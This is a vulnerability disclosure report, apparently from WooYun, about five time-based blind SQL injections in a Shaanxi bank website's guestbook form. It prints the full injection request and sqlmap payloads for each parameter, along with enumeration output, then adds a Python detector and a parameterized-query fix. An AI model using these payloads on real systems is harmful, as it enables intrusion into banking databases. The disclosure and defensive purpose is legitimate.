
Vulnerability summary

Defect ID: wooyun-2015-0148398

Title: 5 SQL injections on the official website of a bank in Shaanxi (over a thousand tables)

Vendor: a bank in Shaanxi

Author: 路人甲

Submitted: 2015-10-21 16:39

Fixed: 2015-12-07 10:54

Published: 2015-12-07 10:54

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-21: Details sent to the vendor; awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in the relevant field
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public

Brief description:

5 POST-based injections; over a thousand tables.

Details:

The official website of Shaanxi Yangling Rural Commercial Bank has 5 POST-based SQL injections; the users database contains 1630 tables... (I don't dump databases, so I stopped here.)

Proof:

Yangling Rural Commercial Bank website: http://**.**.**.**/

[Image: 主页.png (homepage screenshot)]


Construct the following POST data; all five parameters company, contact, content, name and title are injectable.

POST /guestbook.php?action=doinsert HTTP/1.1
Content-Length: 684
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TMYGWKOGUH
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=d8f27294005755d22dcb3bc918161bce
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_HVCDFNWHWB
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--


Confirming with a tool:

sqlmap identified the following injection points with a total of 804 HTTP(s) requests:
---
Parameter: MULTIPART company ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/' AND (SELECT * FROM (SELECT(SLEEP(5)))OUOW) AND 'RgWy'='RgWy
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--
Parameter: MULTIPART content ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))cUsd) AND 'vrue'='vrue
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--
Parameter: MULTIPART title ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.' AND (SELECT * FROM (SELECT(SLEEP(5)))qXdV) AND 'kakx'='kakx
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--
Parameter: MULTIPART name ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme' AND (SELECT * FROM (SELECT(SLEEP(5)))TIif) AND 'ivSv'='ivSv
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--
Parameter: MULTIPART contact ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="company"
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="contact"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))IhDt) AND 'Rrwj'='Rrwj
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="name"
cxfhqcme
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="title"
Mr.
-------AcunetixBoundary_HVCDFNWHWB
Content-Disposition: form-data; name="ui"
1
-------AcunetixBoundary_HVCDFNWHWB--
---


I took a guess that there would be a users database (the connection was slow, so I didn't want to run --dbs); I tried it and sure enough it exists. To my surprise it contains 1630 tables (a bit shocking...). The enumeration ran for a long while, exhausting.
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
Database: users
[1630 tables]

Fix:

Filter the input and fix the code!
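The request above carries five text fields in a multipart body, and the fix amounts to filtering and correcting the code. As an added example (not code from the report or the affected site), the Python below parses such a body, flags fields carrying the time-delay probes quoted in the report, and stores the fields with bound parameters so a probe is kept as data rather than parsed as SQL. The detector patterns and the sqlite3 table standing in for MySQL are assumptions.

```python
"""Parse the guestbook multipart POST, flag time-delay SQL probes, and store the
fields with bound parameters. Added example, not code from the WooYun report or
the affected site; the boundary, field names and probe strings come from the
report, the detector patterns and the sqlite3 table (standing in for MySQL) are assumptions."""
import re
import sqlite3

BOUNDARY = "-----AcunetixBoundary_HVCDFNWHWB"   # value from the report's Content-Type header
# Probe strings quoted in the report: company carries the scanner's heuristic,
# content carries sqlmap's "AND time-based blind" payload.
COMPANY_PROBE = r'''if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/'''
CONTENT_PROBE = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))cUsd) AND 'vrue'='vrue"

def _part(name: str, value: str) -> str:
    """Build one text part the way a browser or scanner does (CRLF line endings)."""
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'

# Constructed body with the same five fields as the reported request.
SAMPLE_BODY = "".join([
    _part("company", COMPANY_PROBE),
    _part("contact", "1"),
    _part("content", CONTENT_PROBE),
    _part("name", "cxfhqcme"),
    _part("title", "Mr."),
]) + f"--{BOUNDARY}--\r\n"

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for text parts (no file uploads).
    Returns {field_name: value} with the value taken verbatim."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or the closing "--" delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields

# Time-delay primitives used by blind SQLi probes; the report's payloads use the MySQL ones.
TIME_DELAY_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),                  # MySQL SLEEP(n)
    re.compile(r"\bbenchmark\s*\(", re.I),              # MySQL BENCHMARK(n, expr)
    re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I),     # the now()=sysdate() heuristic
    re.compile(r"\bwaitfor\s+delay\b", re.I),           # MSSQL
    re.compile(r"\bpg_sleep\s*\(", re.I),               # PostgreSQL
]

def flag_time_delay_probes(fields: dict) -> list:
    """Return the names of fields whose value carries a time-delay SQL primitive."""
    return sorted(name for name, value in fields.items()
                  if any(p.search(value) for p in TIME_DELAY_PATTERNS))

GUESTBOOK_FIELDS = ("company", "contact", "content", "name", "title")

def store_guestbook_entry(conn: sqlite3.Connection, fields: dict) -> dict:
    """Insert the five guestbook fields with bound parameters instead of string
    concatenation: values travel as data, so a probe is stored verbatim and never
    reaches the SQL parser. Returns the row as read back from the table."""
    conn.execute("CREATE TABLE IF NOT EXISTS guestbook(company, contact, content, name, title)")
    conn.execute("INSERT INTO guestbook(company, contact, content, name, title) VALUES (?, ?, ?, ?, ?)",
                 tuple(fields.get(k, "") for k in GUESTBOOK_FIELDS))
    row = conn.execute("SELECT company, contact, content, name, title FROM guestbook "
                       "ORDER BY rowid DESC LIMIT 1").fetchone()
    return dict(zip(GUESTBOOK_FIELDS, row))

def demo() -> tuple:
    """Parse the constructed request, flag the probes, then store the entry safely."""
    fields = parse_multipart(SAMPLE_BODY, BOUNDARY)
    return flag_time_delay_probes(fields), store_guestbook_entry(sqlite3.connect(":memory:"), fields)
```

A web application firewall rule built from the same patterns would have caught both probes in the report; the bound-parameter insert is the actual fix.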

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-23 10:53

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the competent authority for informatization in the banking sector, which will coordinate handling by the website's operating unit, and it has also been sent down to the Shaanxi branch center.

Latest status:

None yet